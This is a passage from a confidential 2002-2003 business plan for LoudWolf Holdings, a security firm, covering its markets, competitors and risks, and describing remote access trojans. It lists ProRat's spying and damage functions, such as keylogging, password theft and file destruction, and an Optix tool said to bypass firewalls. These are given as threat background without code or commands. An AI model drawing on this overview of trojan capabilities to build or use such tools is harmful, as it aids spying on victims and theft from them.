CONFIDENTIAL
Page 1 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Executive Summary
LoudWolf Holdings Ltd. Is a limited liability corporation based in
Guernsey. Its primary focus is to act as a coordinating entity to exploit
the various technologies and products recently acquired by LoudWolf
from its contributing partners. These partners are companies that have
pooled their combined technologies and expertise into LoudWolf and are
now wholly owned subsidiaries of LoudWolf Holdings Ltd.
CONFIDENTIAL
Page 2 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
___Table of Contents 1________________________________________________
Contributing Partners
Digital Animation Inc.
Startech (US) Computer Consultancy Inc.
Startech Computer Consultancy Ltd.
Edison Research Labs
Summary of Core Technologies
Business Overview
Market Size
Growth Trends
Competitors
Expected Competitor’s Responses
LoudWolf’s Competitive Strategy
Risk Factors
Risk Factors & Their Mitigation
Competitive Products
Loss of Trade Secrets
Development Delays
Government Interference
Hacker Interference
The Rixa “STEEL” Series – Born of Necessity
Rixa STEEL Historical Context
Rixa Presents a New Challenge for IP Security Industry
Background Regarding Security Issues
Stealth Trojans on the Horizon
Definitions of a Trojan
The Stealth Trojan
Trojans on the Web
ProRAT Trojan
ProRAT Commands
Toquito Bandito
Optix ICQ
Professional versions
Wheels within wheels (Trojaned Trojans)
Commercial Countermeasures
Trojan Hunter
TDS3
Anti-Anti-Virus functionality
Security Community Response
The Mature Hacking Corporation
The “Take” (Money to Be Made)
More Examples of IP Theft
High-Value IP theft – A case study
Hackers Need Discipline Too
The WolfPak
WolfPak Rules
High-Value IP in today’s connected World
Hacker Quotes
Analysis of Current Hacker Software
Purpose of This Document
Cautionary Disclaimer
Design Rules as a way of describing Functions
Engineer’s Notes on Descriptive Style
The Threat, an Overview
General description, Development Status
Software goals
Overview
Standard IT Procedures on a Trojaned System
A Scenario
How It Was Done
page
page
page
Page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
5
5
5
5
5
5
6
7
7
8
9
10
11
11
11
11
11
11
11
12
12
13
13
13
13
13
14
14
15
15
16
16
16
17
17
18
18
18
19
20
21
22
23
23
24
25
26
27
27
28
28
29
29
29
30
30
31
31-33
34
CONFIDENTIAL
Page 3 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
___Table of Contents 2________________________________________________
Defining Terms
Dangerous
Harmful
Nullable
Useful
Unknown
Benign
Fallback Procedures
Note Regarding PNF Files
Rules regarding PNF files
Dealing With Threats
The Trojan Masters – History and Splinter Groups
Cyber Crooks
Tech Officers
`
Zombies
Extending the NameSpace
Hackers United
Design Rules
First Infection
Untraceable UDP Communications
Rules Regarding Communications
UDP & non-routable Protocols
PC HEALTH
Behavior & Sources of Code
The Unexplained
Pinch Points
The Various Secrets of the Secret Vault
Cache Memory
OS2
DoubleSpace Drives
Bad Blocks on Hard Disk Drives
Operating System Files
System Restore Area
Driver Rollback Files
Windows \System Directory
Page File
HiberFile
Exotic Operating Systems
The Windows Registry
Print Spooler
`
USB devices
Hiding Techniques
NTFS Hidden Date Streams
UPX Ultimate File Packer
Morphine
Undetectables
E. T. Phone Home
Hacker Communications in General
Telephone Techniques
Telephone Dial Up
Telephone Techniques
Anonymous Pager
Call Back
Fax In & Out
UDP Over Telephone
ICMP
TCP/IP
Wireless Communications
Blue Tooth
Radio Keyboards & Mice
Infra-Red Communications
Wireless Access to Non-Wireless
Audio Communications
Soft Modem Communication
Hacking With Audio Communications
Voice Command & Voice Recognition
User Names & Permissions
Certificates of Authority & Digital Signature Certificates
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
35
35
35
35
36
37
37
38
38
39
40
41
41
41
42
42
42
43
44
44
45
45
45
46
46
47
48
48
48
48
49
49
49
49
49
49
49
50
50
50
50
51
52
52
52
52
52
53
53
53
53
53
53
53
53
53
53
53
53
54
54
54
55
55
56
57
58
59
CONFIDENTIAL
Page 4 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
___Table of Contents 3________________________________________________
Persistence of Control- Hanging On
CMOS RAM
EEPROM
Error Messages: & Other Time Gainers
Other Noted Trojan Functionality
LoudWolf Solutions
Rixa STEEL Secure Servers
Rixa STEEL Concept
Product Description
Military Servers
Commercial Servers
General Topography
Consumer Systems
STEEL Standard equipment
SuperKey Technologies
The Problem
Security Encryption Today
Every-day Security
Vital Security
Unbreakable Security-Isn’t
The Best Encryption Available
The LoudWolf Way
Superkeys Product Description
Implementation of a Hardware Session Key
Why Keys are So Important
Anatomy of a Key-Breaker Program
The “Dictionary Attack”
Combination Word Attack
Multiple Language Variant
Number Substitution
The Brute Force Attack
Components of the Super-Key Product
Key Length & Complexity Issues
Variables as Key Components
Secure Satellite Superkeys Sample Application
The Sentinel Series
The Sentinel Sharp
Sentinel Standalone Functionality
Hot ROD Read Only Drive
HVIP Drive Chemical Erasure System
Business Plan Implementation
Overview
Time Lines Months 1-7
Time Lines Month 8-12
End of First Year Summary
Time Lines Months 13 -16
End of Second Year Summary
End of Third Year Summary
Budget Assumptions
Average Salary Per Category of Job
Headcount Over Time
Reference Section
Rixa STEEL Utility Board Documentation
Micro-Controller Specifications
Processor Schematic Diagram
Printed Circuit boards & Schematics
Software Guidelines & Connection Lists
Trojan Read Me Files
Hacker Defender
Optix Pro
FuRootKit
In the News
Biographies:
Paul Fullwood
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
page
60
61
61
62
63
64-67
68
69
70-72
73
74
75
76
77
78
78
78
78
78
78
79
79
80
81
82
82
82
82
82
82
82
83
84
85
86
87-89
87
89
90
91
92
92
93
94
94
95
95
95
96
96
96
97
97
98
99
100
101-107
108-118
108-116
116-117
118
119
120
120-125
CONFIDENTIAL
Page 5 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
THIS DOCUMENT CONTAINS HIGHLY CONFIDENTIAL INFORMATION AND MAY CONTAIN ELEMENTS OF CERTAIN PRORIETARY PRODUCTS, SERVICES AND BUSINESS
INTELLIGENCE WHICH, IF DISCLOSED, MAY CAUSE HARM TO COMPANIES AND INDIVIDUALS - PLEASE DO NOT COPY OR DISTRIBUTE.
Contributing Partners
Digital Animation Inc.
A Silicon Valley-based company specializing in the development of complex software for the encoding and
decoding of highly compressed and secure data streams.
Startech Computer Consultancy Inc.
A Los Angeles-based company, specializing in the development and production of custom integrated hardware
and software products for the television and movie industry.
Startech Computer Consultancy Ltd.
A UK-based hardware & software development company specializing in circuit design for industrial automation.
Edison Research Labs
A Central California-based R&D partnership focused on security research and advanced countermeasure
development.
Summary of Core Technologies
As a result of the acquisition of these companies, LoudWolf owns and controls all aspects of several new and
important technologies. These combined technologies are focused in the following areas:

Process-based computer security systems for military, industrial and commercial
applications.

Hardware-based security devices and technologies for high value intellectual
property protection.

Advanced computer intrusion detection systems for high security military data
systems.

Personal privacy, spy-ware detection technology and data theft protection
software systems.

Hardware-mediated system integrity and verifications systems.

Cryptographic key systems, utilizing hardware-based keys and non-shared secret
key technology.

Encoding systems advanced compression and secure delivery of entertainment
and educational media.

Encoding systems secure transmission of high-value data over insecure
pathways.
CONFIDENTIAL
Page 6 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Business Overview
One of the major difficulties we have faced during the preparation of our business strategy has been the
large number of products envisaged. In two years of fundamental product research we have produced
dozens of potentially marketable solutions and products. Only a selected few products have been presented
in this document. One of the first imperatives as we move forward will be a thorough review of all of these
products with a view to extracting the best of these possibilities for further analysis. It must be assumed that
this review will produce additions and modifications to our product line.
The need for the type of security that LoudWolf provides is clear. LoudWolf has identified large markets in
multiple industries that are clearly awaiting the introduction of the definitive and complete intellectual
property protection system.
The investment opportunity presented clearly has a huge potential. LoudWolf will provide “enabling
technology” for various large market sectors.
The full exploitation of all of the opportunities afforded by these broad technologies will involve
numerous partnerships with industry-leaders, aggressive protection of LoudWolf’s intellectual
property and judicious maintenance of market leadership.
In some cases LoudWolf act as a technology provider rather than a manufacturer / distributor. We
will license our technology to companies who can efficiently sell into their existing markets. In other
cases the technology lends itself to direct sale to consumers; industry and military customers.
In these areas maintenance of market share may involve anti-competitive measures, such as; acquisitions of
fledgling competitors, enforcement of patents and so on. For this reason we will depend heavily on expert
management decisions pertaining to our market protection and anti-competitive strategies.
The various new technologies we will be introducing must be revealed, implemented and exploited with
extreme delicacy. Patents, trade secrets, copyrights and brand-name maintenance must all be coordinated as
a whole so as to ensure maximum investor return. We may hold back on the introduction of certain products
or technologies in certain market segments in anticipation of earning greater rewards by implementing these
technologies at different times. For example:
It would not be unreasonable to withhold a consumer level product incorporating the concept of super keys
until such time as the military implementation of these super keys has been exploited to its fullest. This is
consistent with our financial and marketing model which proscribes the relative marketing economy derived
from direct sales to the military giving LoudWolf the opportunity for early revenues without a large sales and
marketing effort and providing us with high profile reference customers which, in turn, naturally eases the
task of introducing to market our commercial and consumer products at some later date.
Effective exploitation of our discoveries and innovations can be assured only by utilizing the very best of
marketing and business expertise available. The full potential of LoudWolf can be effectively realized by the
delicate application of our existing management expertise provided with sufficient capital to generate a
powerhouse group of companies. We are confident that we can then maintain market leadership in a
multitude of markets. The business structure that we have created is designed to form an effective launch
pad for this strategy.
We have designed various short-term profitability products with short time to market timelines, these are
intended to be distributed by several reliable partners. We have also several midterm high potential products
many of which imply long term an ongoing revenue streams. In addition we possess a small number of
market controlling fundamental technologies. Whilst we cannot expect to maintain dominance in all aspects
of our enterprise, we can certainly anticipate high likelihood of significant return for our investors. The team
of experts we are assembling for these tasks provide us with an enhanced certainty of success.
CONFIDENTIAL
Page 7 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Market Size
LoudWolf’s technologies are applied to various products and services described herein. The market for these
various technologies is very large indeed. Encompassing a broad swath of markets including, but not limited
to, the following areas:
In US Dollars.
Tactical and strategic military computing devices
Estimated Market:
20 Billion
Commercial data communications systems
Estimated Market:
10 Billion
Personal computer security products
Estimated Market:
10 Billion
Enabling technology in entertainment media transmission
Estimated Market:
1 Billion
Enabling technology in media compression systems
Estimated Market:
2 Billion
Total overall sales per year
Estimated Market:
43 Billion
Growth Trends
The growth of these markets exceeds the growth in the overall worldwide computing technology sector due
to existing need to add our technologies to the current installed computer user base in addition to the
incorporation of our technologies into new computer systems. Many of the threats and solutions presented
are not yet widely known and as such are un-tapped markets with growth curves typical of emerging
technologies.
Security Related Growth
The computer security industry, enjoys one of the highest growth rates in the World. For example: In just a
few short years the Anti-Virus program has transitioned from a optional component to essential software for
all computers. We are in the midst of a further transition from “Security as a one-time purchase” to “Security
as a subscription service”. Security technologists are in high demand, one of the few computer technical
specialties still in short supply after the ballooning of tech resources in the period 1998-2000.
Security is an industry that grows when stimulated by advances in hacker technology. “Fed by fear” one
could say. Described in this document are several hundred advances in hacker technology, any one of which
could , and should, be feared. Growth of this market is assured, in fact to keep up with the hacker techniques
we will describe it must accelerate dramatically.
CONFIDENTIAL
Page 8 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Competitors
Leaving aside LoudWolf’s data compression technology, which has no known competitors, the main
competition comes from established companies in the computer security sector.
Computer Associates
McAffee
Norton
FarStone
Internet Security Systems (ISS)
Trend Microsystems
At this time, all of the companies mentioned are in a position to make inroads into LoudWolf’s market. We
can expect that after we launch various products, we will see some combination of the following responses
from these companies and possibly some other startup companies forming who will attempt to build upon our
technologies as they are released.
The following companies have capabilities in that may affect portions of some of LoudWolf’s key technologies.
DiamondCS
VCom
IBM
Mischel Internet Security
In-Q-Tel (Investees)
CONFIDENTIAL
Page 9 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Expected Competitor’s Responses

Competitors will attempt to incorporate LoudWolf’s hardware integration into
their existing software offerings. Either by licensed cooperation or by emulation
of LoudWolf’s systems.

Competitors will begin development of a competitive or perhaps a more
advanced and fully integrated hardware and software systems.

Competitors will seek to acquire LoudWolf technology and incorporate elements
into their existing products and services.

Competitors will attempt to acquire LoudWolf in its entirety by acquisition of our
company.

Competitors will attempt to block or work around LoudWolf’s copyrights &
patents.

Competitors will seek to insert additional products into and around LoudWolf’s
core technology.

Competitors will attempt to exert financial pressure on LoudWolf by discounting
competitive products and / or outspending LoudWolf in marketing funds.

Competitors will seek to acquire experienced LoudWolf personnel familiar with
LoudWolf’s core technologies and future planning.
CONFIDENTIAL
Page 10 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
LoudWolf’s Competitive Strategy
Fundamental to our competitive strategy is the overall pacing of product releases. The skillful deployment of
our products enables a rapid market penetration to be followed by a series of product enhancements to the
core components, adding layers of protection, in keeping with the layered nature of the threats that our
products address.
To a certain extent, LoudWolf can control market demand by the release of “proof of concept”
demonstrations of threat vectors. In fact, in some cases, the vulnerability is not well understood by the
security community and must be “seen to be believed.” Therefore, sometimes it is essential to demonstrate
the vulnerability along with the LoudWolf solution that mitigates the threat.
As LoudWolf rolls out its various technologies, we will look for opportunities to license certain aspects of our
technology to our own potential competitors. The selection of these technologies and the licensee
companies, along with the license terms and conditions, are crucial anti-competitive decisions. The strategic
goal is to forestall independent development of competing technologies and to rapidly advance the market
penetration of our own core technology.
The judicious application of marketing funds towards overall “brand name” development will be required to
maintain and enhance our initial technological leadership in the marketplace. Assisting in this effort, we will
be seeking to leverage a well-known name by partnering with any one of several established security
companies. E.g. Brinks, Securicor, Wells Fargo, Chubb, Yale and the like. Bringing in such a name either by
revenue sharing acquisition or merger is to be considered by LoudWolf an accelerator, rapidly establishing
both a brand name and an overall company valuation multiplier. Failing this, LoudWolf will seek to establish
its own brand name via a re-ordering of its product offerings, launching its high-end military systems first,
and leveraging the, “as used by the military” credentials down the consumer base through the industrial,
commercial and personal user markets.
In order to maintain a leadership position, it is essential that we maintain a steady stream of enhancements
to our deployed products. The timely development and release of additional enhancement products must be
considered in order to protect our market share, once established.
LoudWolf’s ability to expand its initial offering by producing a range of compatible products is a key to
maintaining market dominance. All LoudWolf’s deployment plans are therefore coordinated according to an
overall marketing plan rather than being technology-driven. Our focus is on the growth of revenues and
market penetration rather than the deployment of technology for the sake of technology.
All of LoudWolf’s products are designed to be backward compatible with our previous offerings, allowing for
transition from a sales model to a subscription model or, for our military products, an upgrade model, as the
installed user base grows.
CONFIDENTIAL
Page 11 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Risk Factors
Competitive Products.
Despite extensive and ongoing research, we have not discovered any company encroaching into our core
area of expertise. Nevertheless, this does not mean that there are no companies working on products similar
or identical to some of our existing or proposed products.
It is conceivable that several of our intended products may be developed and released prior to our own, thus
eliminating our “first to market” advantage, and possibly forcing us to reconsider or re-design the product.
This may lead to cost overruns or even product cancellations. Furthermore, our projected revenues from rescheduled or cancelled products may affect our existing cash flow forecasts and revenue projections.
Loss of Trade Secrets.
As product development moves into full swing, it will be necessary to divulge the design details of our core
technologies to a much broader group. There exists a risk that these details may find their way into
competitive companies’ hands, thus eliminating our current lead in research and development. Furthermore,
these companies may have better funding and / or be better equipped to deploy these technologies than
LoudWolf, leading to similar consequences to those described above.
Development Delays.
Several of our products incorporate a complex software development component. Software projects, in
general, are often difficult to budget accurately. Delays caused by inaccurate scheduling can seriously affect
the project’s R&D budget, its associated hardware ship-dates and subsequent revenues.
Government Interference.
Some of our products are designed for military and / or government agency uses, as such there may be
forces brought to bear designed to encourage exclusive sales to one particular government, agency or group.
Stockholder bias and or commercial expediency may prevent or delay release of certain high-end products to
wider markets.
Hacker Interference.
It can be expected that hacker groups of various types and sizes will attempt to gain knowledge of
LoudWolf’s products, for the purposes of circumventing them post-release or, perhaps, attempting to prevent
the release of products that present a threat to their activities. LoudWolf has experienced this activity
already and has been the target of a multitude of serious hacker group attacks. LoudWolf faces a risk that its
own development systems might be successfully compromised by these groups, which may result in data loss
and product development delays.
It should be noted however, that this type of attack has, already occurred many times. On numerous
occasions LoudWolf systems have been penetrated and or destroyed. Resulting in data loss, development
delays and expenses related to re-building of software systems. The “Weathering” of these Storms, has
generally resulted in the “hardening” and verification of the effectiveness of LoudWolf’s technologies, and
forced us to make certain changes in development methods and backup procedures. These attacks though
not pleasant, on the whole, considered a “necessary evil.”
CONFIDENTIAL
Page 12 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
The Rixa “STEEL” Series - Born of Necessity
Rixa STEEL  High-value intellectual property protection.
The RIXA brand and RIXA portions of the RIXA STEEL
concept are incorporated into LoudWolf technologies by
the acquisition of Digital Animation Inc. The following
narrative describes a history of the product along with an
overview of its operational parameters.
Rixa STEEL –XA Historical Context
Digital Animation Inc. began developing the Rixa STEEL “XA” concept in Q4 2001. Development was handed
over to Edison Labs in January 2003. In 2001, Digital Animation was demonstrating its revolutionary
technique for compressing, transmitting and decompressing high-value, animated entertainment feature films
over the Internet. This product was the culmination of years of development and 1.1 Million U.S. Dollars of
funding. Prior to test deployment of the product, Digital Animation ran across a seemingly insurmountable
roadblock--The unexpectedly difficult task of protecting the high-value feature films on its servers.
The Rixa STEEL system was born of necessity. We became aware of a number of serious security flaws in
the then “state of the art” server software. This was underlined for us in a very dramatic fashion as the
hacker community became aware of our product following a five-city tour of China in October 2001, which
garnered a good deal of media and hacker attention.
The hacker community apparently saw Rixa technology as an opportunity for profit by using it to create a
swapping service much like Napster for video entertainment. A coordinated attack was launched upon us
with the apparent goal to preempt our product launch and steal our encoding software and encryption keys
directly from our development servers in Silicon Valley!
By chance, we headed off the attempted theft, and by another fortuitous circumstance were able to log the
hacker’s methodology. To our dismay, we were able to discern that the best of the hackers’ software was far
more sophisticated than that we had anticipated. Indeed, the suite of programs we now had in our
possession was, and still remains, unmentioned in the security literature and has been all but ignored by
national infrastructure security organizations such as CERT, NIST, etc. This was no Nimda or Goner virus,
not even a Back Orifice Trojan horse. This software was more subtle, much more clandestine, designed to
elude detection and persist indefinitely, acting as a permanent “spy in the works.”
The operational details of this ‘spy-ware’ can be found elsewhere in this document. The experience we gained
being exposed to the latest in cyber “crime-ware” and being able to capture this code for analysis was quite
an “eye opener.”
We had spent a good deal of effort in achieving an impregnable client-side security solution. We had
mistakenly assumed that the issue of server side security was better left in the hands of the experts in the
field. The revelation of the software we had now acquired proved, beyond a shadow of a doubt, that even
the most secure [server-side] software was grossly inadequate to protect the high-value intellectual property
of our prospective clients.
Analysis of this software proved that all of the commonly used operating systems that run today’s computer
and internet infrastructure were, to a greater or lesser degree, susceptible to this spy-ware and could not be
considered candidates for the operating and security system’s hosting and protecting of high-value
intellectual property. It became clear that we must undertake the project of providing end-to-end security for
our clients or face the prospect of being both the first company to transmit pay-per-view video on demand
over the internet and the first to lose all of their content to hackers in one stroke.
CONFIDENTIAL
Page 13 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa Presents a New Challenge for the IP Security Industry
Rixa technology enables the compression of animated feature-length entertainment to such a high degree of
efficiency that it can be transmitted at better-than-DVD quality in LESS than real time. (Typically a 90 minute
feature in 30-40 minutes.) This novel technology presents the content and infrastructure owners with a series
of new challenges, especially where security is concerned. Imagine the scenario - Rixa transmission
technology presents a wonderful opportunity to the content owners. Rixa compresses the entertainment
video so well that it becomes possible, for the first time, to distribute full-screen, full-motion, entertainmentquality, content over the existing Internet. This opportunity is nothing short of outstanding for content
owners! However, it also serves as a “honey pot” of great value to intellectual property pirates. For the
cyber-thief, the prospect of a server full of highly compressed and therefore “shareable” content presents a
Napster-like opportunity not to be missed. A rich target indeed. And targeted we were!
Background Regarding Security Issues
We are familiar with the common security threats we all face as computer users. We all have anti-virus
programs installed on our systems, and have become familiar with the names of some of the more malicious
virus threats such as Nimda, Goner, CAK Worm, SirCam and Code Red. These virus programs come in all
forms and can cause, to greater and lesser degrees, data loss and security compromise. The standard
information technology response to an infection is “run a clean-up utility, update your anti-virus software and
get back to work.” In the more serious cases, the standard response is preceded by the more drastic,
“reinstall your system software and restore your data from a backup.” (If you have one.)
This is assuming that you know you have a problem. The virus threat is the beginning of a security issue not
the entire issue. It is the entry point for software that penetrates the “outer skin” of the system. In the past,
amateurs have designed these virus programs. Their function is to spread, propagate and in the worst cases
destroy data. Often the onset is announced. For example, Nimda says, “HI” while the Goner virus advises,
“You are a GONER.” Up until recently, the compromise has always been announced, or is easily recognized,
as the system becomes damaged either by the virus destroying files or as a result of the congestion of
system resources caused by the unchecked replication on the system. In either case, system compromise is
revealed to the user by a bold announcement or by obvious signs of infection. Things are about to change.
Stealth Trojans on the Horizon - Definitions of a Trojan
The Trojan horse, named after the mythical wooden horse in Homer’s Iliad, was built by the Greeks while
besieging the city of Troy. Its contents were a “payload” of Greek soldiers, which, once brought inside the
city gates, deployed with devastating results.
The modern-day software version of the Trojan horse contains a payload of programs. In most cases, an
illicit server that can be contacted by its masters and provide un-monitored clandestine access to the target
network for the delivery and receipt of data and / or additional software.
The first of these Trojans to gain some degree of notoriety was the unauthorized use of a legitimate remote
control program called NetBus. Building upon this success, the hackers perfected a more sophisticated
clandestine remote access system with the moniker, Back Orifice (A pun on Microsoft’s Back Office system; a
postmaster control program for many corporate systems). Back Orifice and other Trojan programs are
designed to give the hacker access to the entire target network and remain hidden from view indefinitely.
The fact that the security community is aware of Back Orifice would indicate that, in this regard, it is a failure.
The Stealth Trojan
Are we to assume that the hacker community is entirely composed of amateurs? Should we rest assured that
the hubris of the hackers will remain such that they cannot resist the temptation to reveal their presence on
our systems and effectively announce, “Look at me, am I not smart? I have penetrated your system!” Will
the cyber pirates continue to be kind enough to let us know when we are compromised? No, of course not.
Building upon the success of their amateur comrades, a new breed of cyber criminals is now reaching
maturity. We are now entering a new age of computer crime; more organized, more discrete, driven by profit
and power rather than pride and anonymous peer recognition. Examples of clandestine Trojans are:
Vanquish, Assassin, Sub7, BO2K (Updated Back Orifice), Optix pro, FuRootKit, Eternity, FunFactory,
Insurrection, ProRAT, Theef, SPARTA, ToquitoBandit, HackerDefender and hundreds more.
CONFIDENTIAL
Page 14 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Trojans on the Web
These Trojan suites or Remote Access Trojans (RATs) as they are called in hacker parlance are freely
available on the web, they can be downloaded and used to control other computers on the Internet. The
degree of control is astonishing, these programs allow access to your computer as if the hacker was at your
keyboard and in possession of all your passwords. The hacker can view your desktop in real-time (If your
internet speed is good enough) or for slower connections the hacker can get screen-shots, while controlling
your system from a command screen similar to a Telnet screen.
The Trojan software is a collection of programs or a “Suite”. There are always at least two parts to any
Trojan suite. (Often there are many). The minimum Trojan consists of:
1/ The program which resides on the victim’s computer allowing access and remote control. This is
referred to as the “Server”
2/ The program which runs on the Hackers system which is used to connect to the Server on the
victim’s computer, known as the “Client”.
The Server is designed to be invisible, it is a small program that runs every time the victim’s machine starts
or, in some cases, activates at preset times.
The Client program runs on the Hacker’s machine and ranges in complexity from a simple Telnet command
screen to a full-blown graphical user interface. Such as the ProRat V1.6 screen below.
Notice the various command buttons available to the Hacker, obviously this is a powerful and dangerous tool,
but also note the easy to use point-and-click nature of this software. Very little, if any, programming or
software knowledge is required in order to wreak havoc or spy unobtrusively
CONFIDENTIAL
Page 15 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Commands available on an example Trojan (ProRat 1.6).
PC Info
Message
Chat
Funny Stuff
IE Explorer
Control Panel
Shut Down PC
Clipboard
Give Damage
R. Downloader
Tools
On-Line Editor
Collects and displays information about the victim’s machine & Software.
Send message to the victim.
Chat with the victim.
e.g. Open & close the CD draw, switch the Mouse buttons, flash the keyboard LEDs.
Open Explorer for access to Internet and / or HTML files on the victim’s computer.
Open Control Panel - Allows access to hardware, software & security settings.
Shut down or re-boot the victim’s machine.
View the victim’s clipboard, copy to the victims clipboard.
Destroy files, damage system files, erase configuration data etc.
Remote download files from the victim’s computer.
Various tools to hide programs & manipulate files and server settings.
Edit text files on the victim’s system.
Printer
Applications
Windows
FTP & Telnet
File Manager
Search Files
Registry
Screen Shot
Key-logger
Passwords
Run
Create
Send data to the victim’s or a local printer.
View and or run applications on the victim’s computer.
View or add a window on the victims, computer, open a local window.
Run a textual command screen interface to the victim’s computer.
View & manipulate files on the local or the victim’s computer.
Search for filenames or files containing a particular word.
Edit registry settings on the victim’s computer.
Get an image of the victims screen.
Start/Stop a program which records every key press on the victim’s computer.
Get the victim’s passwords.
Run a program locally or on the victim’s computer.
Create a file – a folder, or a new victim profile.
Many other functions are available depending on the suite that is used. One popular function absent
from ProRat is the “Remote Desktop” feature that works mainly with Windows XP systems allowing
the hacker to view and control a remote version of the victim’s desktop.
Toquito Bandito - Remote Access Trojan (RAT) selection of screen-shots
Other parts of Trojan components have specific purposes such as; hiding utilities, remote paging, music
trolling, password stealing, Email forwarding, etc.
CONFIDENTIAL
Page 16 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Optix ICQ Pager notifying tool.
Part of the Optix Pro Trojan Suite, This is an ICQ paging tool that notifies the hacker of a successful take-over
of a victim. This program gains trusted internet access permissions from other programs such as Outlook or
Windows Media Player to successfully bypass all firewalls!
The Professional versions
These programs are not viruses their goal is to control your system not merely to replicate and or damage
files. Their purpose is clandestine monitoring and control. These programs are designed to hide. They
promise the hacker anonymity and allow them to roam the Internet freely capturing victims. These Trojan
operators are the so called “Script Kiddies”. They use programs others have built to perform their evil deeds.
However, there are better programs than these that are not so well known. The Trojan writer referred to in
this document as the “Trojan Master”, is generally not going to allow his hard work in creating a Trojan to be
squandered by releasing the software to all and sundry on the Internet. No. The Trojan Master is several
levels ahead of these free downloadable versions. The Trojan Master shares his wares not at all, or only to a
select few peers. (Usually in exchange for complimentary software.) These are the most dangerous people
on the Web.
The Trojan Masters refrain from releasing their software widely since it is obvious that once in the hands of
many “Script Kiddies” sooner or later it will be detected, captured and analyzed by the security community.
Soon after, Microsoft releases a patch and the Security companies release an updated scanner to block
access. The effectiveness of the software is crippled, (Although it should be noted that patches and updates
are never applied in a timely manner nor to every computer) Nevertheless, it should be clear that this type of
software has its highest value only if kept totally secret. And secret it is indeed. We should note also that
the term: Trojan Masters, may apply to individual talented programmers, Teams of programming friends in
close association, distributed groups of anonymous contributors, large corporations and government
agencies. Their goals are varied, but all share one overriding desire, to gain the ability to control as many
systems as possible (Known in hacker parlance as “Extending the name-space”) and use this power to gain
access to intellectual property (IP) of all flavors at times of their choosing.
Wheels within Wheels
The Trojan is sneaky software. The Trojan Masters are, by nature, sneaky people. Many have seen an
opportunity to gain control of massive numbers of computers by "Trojaning" the Trojans. Simply put, the
release version of a Trojan will produce hundreds of thousands of isolated attacks in the hands of the Script
Kiddies. If the software is subtly tweaked, just a little bit, it can be designed to leave a “back door” for the
Masters who can later browse through the Script Kiddie’s victims, at will. Clearly a tempting “master-stroke”
of deception. And many of these Trojans do just that. They are “Back-Doored” in hacker parlance. Ironically
the Script Kiddies (Who often consider themselves bold hackers) are, in effect, hacked themselves and
manipulated by the Masters. Just one Trojan (Optix Pro) from one download site had logged 275,000
Downloads as of April 2004! The overall number of Trojans suites in the hands of the Script Kiddies is,
conservatively put, in the Tens of Millions!
CONFIDENTIAL
Page 17 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Commercial Counter Measures
These Trojans are designed to elude Anti-Virus and Fire-Wall programs, and so it follows that before they are
widely released they do just that. There is no defense at all for a “fresh” Trojan.
The Trojan Masters are talented folks and they have a permanent advantage over the counter-measure
community because the Masters have the anti-virus programs to test their work with. Whereas the counter
measure community have no way to view the Trojan Masters programs before they are captured and
analyzed. Hence, the Trojan Master will test his software with all known detection systems to be sure that he
